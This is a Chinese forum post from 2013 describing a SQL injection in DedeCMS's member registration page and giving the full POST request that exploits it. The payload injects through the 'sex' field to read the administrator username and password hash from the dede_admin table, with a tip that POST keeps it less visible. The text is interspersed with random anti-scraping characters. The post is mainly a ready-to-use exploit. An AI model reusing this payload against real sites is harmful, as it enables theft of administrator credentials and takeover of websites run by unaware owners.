找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2198|回复: 0
打印 上一主题 下一主题

织梦SQL注入漏洞再利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-19 08:25:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
漏洞类型: SQL注射漏洞
% W5 {+ W! U9 e简要描述:) Q7 j( D2 V6 A3 p% ]8 d! k
4 Q) A! B9 d1 s; ?0 c8 c% o
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
$ V8 [6 f6 @0 n4 y: q/ l原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.
) T1 O* q3 d; [5 r( e  T( Y4 J+ i$ ~详细说明:跟这个漏洞
3 K" p' l7 ^- o# O7 `! W
8 A5 E, ~: }- z! d" l# x) K: \9 ?+ F# qWooYun: Dedecms SQL注射导致审核机制绕过漏洞, Z8 [# f: S) \. j& s
是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.2 }, n" h* O3 b0 D/ \! H
POST提交以下数据,其实不用POST提交的,这样隐蔽点.) i6 b  O, J( F$ U6 K& s
( s2 T' s7 D4 K! Q* V; _; {  V0 r
www.political-security.com/member/reg_new.php
, c. w: I% `. r0 O8 U' A) z 5 ^9 o8 k9 k2 L# a8 x/ P& p! N1 a
POST
* g/ O: U7 O- v4 b" Y1 C4 J  T   u" v7 c7 z5 Y3 Z
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
" W6 ]$ _* |/ y4 x( _userid=c4rp3nt3r&uname=c4rp3nt3r2 R6 b$ S& n$ N( `; Y# D7 A
&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss
: _) d' B# v- i! O* N+ a3 i; J&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
/ M8 W1 U6 q& |# z1 Q) V- l(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');
! a- M  s/ j# S) m& R+ v3 u$ _%00&vdcode=glos&agree=
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表